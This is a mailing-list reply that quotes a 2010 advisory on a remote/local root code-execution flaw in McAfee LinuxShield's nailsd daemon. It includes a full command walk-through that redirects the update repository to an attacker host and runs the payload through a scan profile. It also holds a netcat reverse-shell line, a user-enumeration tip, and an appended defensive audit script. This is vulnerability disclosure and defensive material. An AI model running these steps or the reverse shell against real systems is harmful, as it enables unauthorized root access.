
Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution



ACK! You can find users who can log in to the web interface with this trick.


Am 03.03.2010 09:14, schrieb Veal, Richard:
> 
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using an
> invalid username / any password you get "Error: bad credentials", but
> when attempting to log in with a valid username / invalid password you
> seem to get:
> 
> "Error: bad credentials
> Error Information
> Error Code    Description
> 34    authentication failure"
> 
> Version 1.5.1, anyone confirm? Has this been mentioned before?
> 
> 
> Rich
> 
> 
> 
> -----Original Message-----
> From: NSO Research [mailto:nso-research@xxxxxxxxxx] 
> Sent: 02 March 2010 21:30
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> 
> ______________________________________________________________________
> 
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> ______________________________________________________________________
> ______________________________________________________________________
> 
> ______________________________________________________________________
> ______________________________________________________________________
> 
>   Title:                  McAfee LinuxShield remote/local code
>                           execution
>   Severity:               Medium
>   Advisory ID:            NSOADV-2010-004
>   Found Date:             07.12.2009
>   Date Reported:          05.02.2010
>   Release Date:           02.03.2010
>   Author:                 Nikolas Sotiriu (lofi)
>   Website:                http://sotiriu.de
>   Twitter:                http://twitter.com/nsoresearch
>   Mail:                   nso-research at sotiriu.de
>   URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
>   Vendor:                 McAfee (http://www.mcafee.com/)
>   Affected Products:      McAfee LinuxShield <= 1.5.1
>   Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
>   Remote Exploitable:     Yes (attacker must be authenticated)
>   Local Exploitable:      Yes
>   Patch Status:           Vendor released a patch (See Solution)
>   Discovered by:          Nikolas Sotiriu
>   Thanks to:              Thierry Zoller: For the permission to use his
>                                           Policy
> 
> 
> Background:
> ===========
> 
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
> 
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
> 
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
> 
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host at
> any time.
> 
> When kept up-to-date with the latest virus-definition (DAT) files,
> LinuxShield is an important part of your network security. We recommend
> that you set up an anti-virus security policy for your network,
> incorporating as many protective measures as possible.
> 
> LinuxShield uses a web-browser interface, and a large number of
> LinuxShield installations can be centrally controlled by ePolicy
> Orchestrator.
> 
> (Product description from LinuxShield Product Guide)
> 
> 
> 
> Description:
> ============
> 
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of McAfee LinuxShield. User interaction is not
> required to exploit this vulnerability, but an attacker must be
> authenticated.
> 
> The LinuxShield web interface communicates with the locally installed
> "nailsd" daemon, which listens on port 65443/tcp, to make configuration
> changes, query the configuration and execute tasks.
> 
> Each user who can log in to the victim box can also authenticate to
> "nailsd" and can make configuration changes and execute tasks with root
> privileges.
> 
> A direct execution of commands is not possible, but it is possible to
> download and execute code through manipulation of the configuration and
> the scheduled tasks of LinuxShield.
> 
> 
> walk-through (after the TLS handshake):
> +--------------------------------------
> 
> nailsd  > +OK welcome to the NAILS Statistics Service
> attacker> auth <user> <pass>
> nailsd  > +OK successful authentication
> 
> # Set the Attacker repository to download our code from a httpd
> # (catalog.z)
> #---------------------------------------------------------------
> attacker> db set 1 _table=repository status=1 siteList=<?xml\ version
>           ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi
>           st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209
>           161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU
>           ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1
>           "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela
>           tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
>           UserName><Password\ Encrypted="0"/></HttpSite></SiteList></
>           ns:SiteLists> _cmd=update
> nailsd  > +OK database changes buffered.
> 
> # Execute task to set the attacker repository
> #---------------------------------------------------------------
> attacker> task setsitelist
> nailsd  > +OK setting sitelist from CMA.
> 
> # Execute the default Update task to download the code
> #---------------------------------------------------------------
> attacker> task nstart LinuxShield Update
> nailsd  > +OK task LinuxShield Update starting
> 
> # Create a Scan profile, which executes our code. The profiles are
> # not stored in the database.
> # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
> #---------------------------------------------------------------
> attacker> sconf ODS_99 begin
> nailsd  > +OK 1260400888
> 
> # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
> # where our earlier downloaded catalog.z file is stored.
> # (/opt/McAfee/cma/scratch/update/catalog.z)
> #---------------------------------------------------------------
> attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
>           true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
>           DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
>           10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
>           ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
>           file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
>           ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
>           ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
>           .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
>           risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
>           e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
>           .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
>           le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
>           dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
>           e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
>           ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
>           o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
>           .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
>           rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
>           ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
>           00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
>           ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
>           ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
>            nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
>           ofile.ODS_99.filter.extensions.type=extension nailsd.profil
>           e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
>           .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
>           action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
>           econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
>           ss nailsd.profile.ODS_99.action.error=Block
> nailsd  > +OK configuration changes buffered
> attacker> sconf ODS_99 commit 1260400888
> nailsd  > +OK configuration changes stored
> 
> # Set a scan task with the manipulated profile to execute the code
> #---------------------------------------------------------------
> attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
>           pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
>           mp;exclude:false timetable=type=unscheduled taskResults=0 i
>           _lastRun=1260318482 status=Stopped _cmd=insert
> nailsd  > +OK database changes buffered
> 
> # Execute scan task to execute the code
> #---------------------------------------------------------------
> attacker> task nstart Evil Task
> 
> +-------------------------------------- walk-through EOF
> 
> 
> To get a reverse root shell place something like this in the catalog.z
> 
> --- snip ---
> #!/bin/sh
> nc -nv <attacker_host> 4444 -e /bin/sh
> --- /snip ---
> 
> 
> 
> Proof of Concept :
> ==================
> 
> http://sotiriu.de/software/NSOPOC-2010-004.tar.gz
> 
> 
> 
> Solution:
> =========
> 
> McAfee Advisory
> +--------------
> https://kc.mcafee.com/corporate/index?page=content&id=SB10007
> 
> 
> 
> Disclosure Timeline (YYYY/MM/DD):
> =================================
> 
> 2009.12.07: Vulnerability found
> 2010.02.03: Asked vendor for a PGP key
> 2010.02.05: Vendor sent his PGP key
> 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
>             date (2010.02.18) to Vendor
> 2010.02.05: Vendor acknowledges the reception of the advisory
> 2010.02.16: Asked for a status update, because the planned release date
>             is 2010.02.18.
> 2010.02.16: Vendor responds that they are currently working on a patch
> 2010.02.17: Changed release date to 2010.02.25.
> 2010.02.22: Vendor gives a status update that they will be able to
>             release the patch on 2010.02.25.
> 2010.02.24: Asked for a list of affected products and the advisory URL.
> 2010.02.24: Vendor sends the list.
> 2010.03.02: Release of this Advisory
> 
> 
> 
> 
> 
> 
> 
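As an added defender-side example (not part of the advisory, the thread or McAfee's own code), a small Python audit over the two configuration artefacts the walk-through above manipulates: a profile commit whose scannerPath points outside the engine directory, or that mixes in keys of another profile, and a siteList whose HttpSite Server is not an approved update repository. The engine directory, the approved-repository list, the hostname and both sample values are assumptions constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Assumed allow-lists, not taken from the advisory: the directory a legitimate
# scanner binary is expected to live in, and the repository hosts this site uses.
ENGINE_DIR = "/opt/NAI/LinuxShield/engine/"
APPROVED_REPOS = {"epo.corp.example:80"}  # placeholder host

def parse_settings(payload):
    """Turn the space-separated key=value list of an 'sconf <profile> set' into a dict."""
    return dict(re.findall(r"(nailsd\.profile\.\S+?)=(\S*)", payload))

def audit_profile(profile, settings):
    """Flag settings a legitimate commit for `profile` should not contain:
    keys belonging to another profile, and a scannerPath outside ENGINE_DIR
    (the walk-through points it at a downloaded catalog.z instead)."""
    findings = []
    prefix = f"nailsd.profile.{profile}."
    for key, value in settings.items():
        if not key.startswith(prefix):
            findings.append(f"{key}: key belongs to a profile other than {profile}")
        elif key.endswith(".scannerPath") and not value.startswith(ENGINE_DIR):
            findings.append(f"{key}: scanner path {value} is outside {ENGINE_DIR}")
    return findings

def audit_sitelist(sitelist_value):
    """Return HttpSite servers in a siteList value that are not approved repositories."""
    # The value is backslash-escaped ('\ ' for space) exactly as in the db set command.
    root = ET.fromstring(sitelist_value.replace("\\ ", " "))
    return [site.get("Server") for site in root.iter()
            if site.tag.endswith("HttpSite") and site.get("Server") not in APPROVED_REPOS]

# Constructed samples modelled on the advisory's walk-through (host is a placeholder).
SAMPLE_PROFILE = (
    "nailsd.profile.ODS_99.allFiles=true "
    "nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat "
    "nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so "
    "nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z"
)
SAMPLE_SITELIST = (
    '<?xml\\ version="1.0"\\ encoding="UTF-8"?>'
    '<ns:SiteLists\\ xmlns:ns="naSiteList"\\ Type="Client"><SiteList\\ Default="1"\\ Name="SomeGUID">'
    '<HttpSite\\ Type="repository"\\ Name="EvilRepo"\\ Order="1"\\ Server="attacker.example:80"\\ Enabled="1">'
    '<RelativePath>nai</RelativePath><UseAuth>0</UseAuth></HttpSite></SiteList></ns:SiteLists>'
)
if __name__ == "__main__":
    for finding in audit_profile("ODS_99", parse_settings(SAMPLE_PROFILE)):
        print("PROFILE:", finding)
    for server in audit_sitelist(SAMPLE_SITELIST):
        print("ROGUE REPO:", server)
```

Run against real input, the same checks apply to a periodic dump of the scan profiles and the repository sitelist rather than to a captured command.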